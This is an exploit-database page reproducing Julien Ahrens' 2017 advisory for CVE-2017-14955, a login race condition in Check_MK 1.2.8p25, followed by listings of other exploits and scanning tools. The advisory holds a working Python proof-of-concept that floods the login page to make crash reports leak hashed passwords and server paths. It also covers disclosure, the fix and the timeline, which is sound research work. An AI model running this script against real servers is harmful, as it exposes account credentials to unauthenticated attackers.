"Check_MK 1.2.8p25 - Information Disclosure"

Author

Exploit author

"Julien Ahrens"

Platform

Exploit platform

python

Release date

Exploit published date

2017-10-18

                
                    
                         Download file
                    
                
            
1. ADVISORY INFORMATION
=======================
Product:        Check_mk
Vendor URL:     https://mathias-kettner.de/check_mk.html
Type:           Race Condition [CWE-362]
Date found:     2017-09-21
Date published: 2017-10-18
CVSSv3 Score:   7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE:            CVE-2017-14955


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Check_mk v1.2.8p25
Check_mk v1.2.8p25 Enterprise
older versions may be affected too.


4. INTRODUCTION
===============
Check_MK is comprehensive IT monitoring solution in the tradition of Nagios.
Check_MK is available as Raw Edition, which is 100% pure open source, and as
Enterprise Edition with a lot of additional features and professional support.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
Check_mk is vulnerable to an unauthenticated information disclosure through a
race condition during the authentication process when trying to authenticate
with a valid username and an invalid password.

On a failed login, the application calls the function save_users(), which
performs two os.rename operations on the files "contacts.mk.new" and
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):

[..]
   # Check_MK's monitoring contacts
   filename = root_dir + "contacts.mk.new"
   out = create_user_file(filename, "w")
   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
   out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
   out.close()
   os.rename(filename, filename[:-4])

   # Users with passwords for Multisite
   filename = multisite_dir + "users.mk.new"
   make_nagios_directory(multisite_dir)
   out = create_user_file(filename, "w")
   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
   out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
   out.close()
   os.rename(filename, filename[:-4])
[...]

When sending many concurrent authentication requests with an existing/valid
username, such as:

POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1

---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"

login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"

index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"

omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"

welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

Login
---9519178121294961341040589727--

Then it could happen that one of both os.rename() calls references a non-
existing file, which has just been renamed by a previous thread. This causes the
Python script to fail and throw a crash report, which discloses a variety of
sensitive information, such as internal server paths, account details including
hashed passwords:

</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
                             'contactgroups': ['all'],
                             'disable_notifications': False,
                             'email': u'admin@example.com',
                             'enforce_pw_change': False,
                             'last_pw_change': 0,
                             'last_seen': 0.0,
                             'locked': False,
                             'num_failed': 0,
                             'pager': '',
                             'password': '$1$400000$13371337asdfasdf',
                             'roles': ['admin'],
                             'serial': 2},

A script to automatically exploit this vulnerability can be found on [0].

6. POC
======

#!/usr/bin/python
# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
# Version:       <=3D 1.2.8p25
# Date:          2017-10-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on:     1.2.8p25
# CVE:=09=09 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)

import requests
import threading

try:
=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
=09pass

# Config Me
target_url =3D "https://localhost/check_mk/login.py"
target_username =3D "omdadmin"

proxies =3D {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

def make_session():
=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
'random'), '_login': (None, 'Login')})
=09return v.content

NUM =3D 50

threads =3D []
for i in range(NUM):
    t =3D threading.Thread(target=3Dmake_session)
    threads.append(t)
    t.start()

7. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only
have network-level access to the application.

The vulnerability allows remote attackers to trigger an exception, which
discloses a variety of sensitive internal information such as:
- Local server paths
- Usernames
- Passwords (hashed)
- and user directory-specific attributes (i.e. LDAP)


8. SOLUTION
===========
Update to 1.2.8p26.


9. REPORT TIMELINE
==================
2017-09-21: Discovery of the vulnerability
2017-09-21: Sent limited information to publicly listed email address
2017-09-21: Vendor responds and asks for details
2017-09-21: Full vulnerability details sent to vendor
2017-09-25: Vendor pushes fix to git
2017-10-01: MITRE assigns CVE-2017-14955
2017-10-16: Fix confirmed
2017-10-18: Public disclosure


10. REFERENCES
=============
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-10-23	"Ajenti 2.1.36 - Remote Code Execution (Authenticated)"	webapps	python	"Ahmet Ümit BAYRAM"
2020-10-16	"aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)"	webapps	python	"Ünsal Furkan Harani"
2020-08-04	"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)"	webapps	python	"Luis Vacacas"
2019-12-24	"Django < 3.0 < 2.2 < 1.11 - Account Hijack"	webapps	python	"Ryuji Tsutsui"
2019-10-14	"Ajenti 2.1.31 - Remote Code Execution"	webapps	python	"Jeremy Brown"
2019-09-30	"thesystem 1.0 - Cross-Site Scripting"	webapps	python	"Anıl Baran Yelken"
2019-09-30	"TheSystem 1.0 - Command Injection"	webapps	python	"Sadik Cetin"
2019-04-03	"PhreeBooks ERP 5.2.3 - Remote Command Execution"	remote	python	"Metin Yunus Kandemir"
2019-02-15	"Jinja2 2.10 - 'from_string' Server Side Template Injection"	webapps	python	JameelNabbo
2019-01-07	"Mailcleaner - Authenticated Remote Code Execution (Metasploit)"	remote	python	"Mehmet Ince"

Release Date	Title	Type	Platform	Author
2020-11-27	"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF"	webapps	multiple	"Julien Ahrens"
2019-05-14	"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection"	webapps	php	"Julien Ahrens"
2019-04-10	"Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution"	webapps	php	"Julien Ahrens"
2017-12-26	"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation"	local	windows	"Julien Ahrens"
2017-10-18	"Check_MK 1.2.8p25 - Information Disclosure"	webapps	python	"Julien Ahrens"
2017-10-13	"AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery"	webapps	php	"Julien Ahrens"
2016-11-22	"AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting"	webapps	java	"Julien Ahrens"
2016-11-21	"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal"	webapps	java	"Julien Ahrens"
2016-07-13	"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities"	webapps	xml	"Julien Ahrens"
2016-05-23	"XenAPI 1.4.1 for XenForo - Multiple SQL Injections"	webapps	php	"Julien Ahrens"
2016-02-23	"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery"	webapps	json	"Julien Ahrens"
2014-06-01	"Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP)"	remote	windows	"Julien Ahrens"
2014-03-17	"Free Download Manager - Stack Buffer Overflow"	dos	windows	"Julien Ahrens"
2014-03-09	"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution"	remote	windows	"Julien Ahrens"
2014-02-20	"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution"	remote	windows	"Julien Ahrens"
2014-02-19	"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow"	remote	windows	"Julien Ahrens"
2013-11-30	"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Local Buffer Overflow (SEH)"	local	windows	"Julien Ahrens"
2013-11-18	"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow"	dos	windows	"Julien Ahrens"
2013-09-08	"Watchguard Server Center - Local Privilege Escalation"	local	windows	"Julien Ahrens"
2013-07-02	"Winamp 5.63 - Invalid Pointer Dereference"	dos	windows	"Julien Ahrens"
2013-07-02	"Winamp 5.63 - Stack Buffer Overflow"	dos	windows	"Julien Ahrens"
2013-05-04	"ABBS Audio Media Player 3.1 - '.lst' Local Buffer Overflow"	local	windows	"Julien Ahrens"
2013-03-22	"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Local Privilege Escalation"	local	windows	"Julien Ahrens"
2013-03-04	"HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting"	webapps	java	"Julien Ahrens"
2013-02-23	"Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities"	remote	windows	"Julien Ahrens"
2013-02-15	"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption"	local	windows	"Julien Ahrens"
2013-01-14	"Serva 2.0.0 - DNS Server QueryName Remote Denial of Service"	dos	windows	"Julien Ahrens"
2013-01-14	"Serva 2.0.0 - HTTP Server GET Remote Denial of Service"	dos	windows	"Julien Ahrens"
2012-11-20	"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow"	local	windows	"Julien Ahrens"
2012-11-12	"Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing"	local	windows	"Julien Ahrens"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Check_MK 1.2.8p25 - Information Disclosure"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.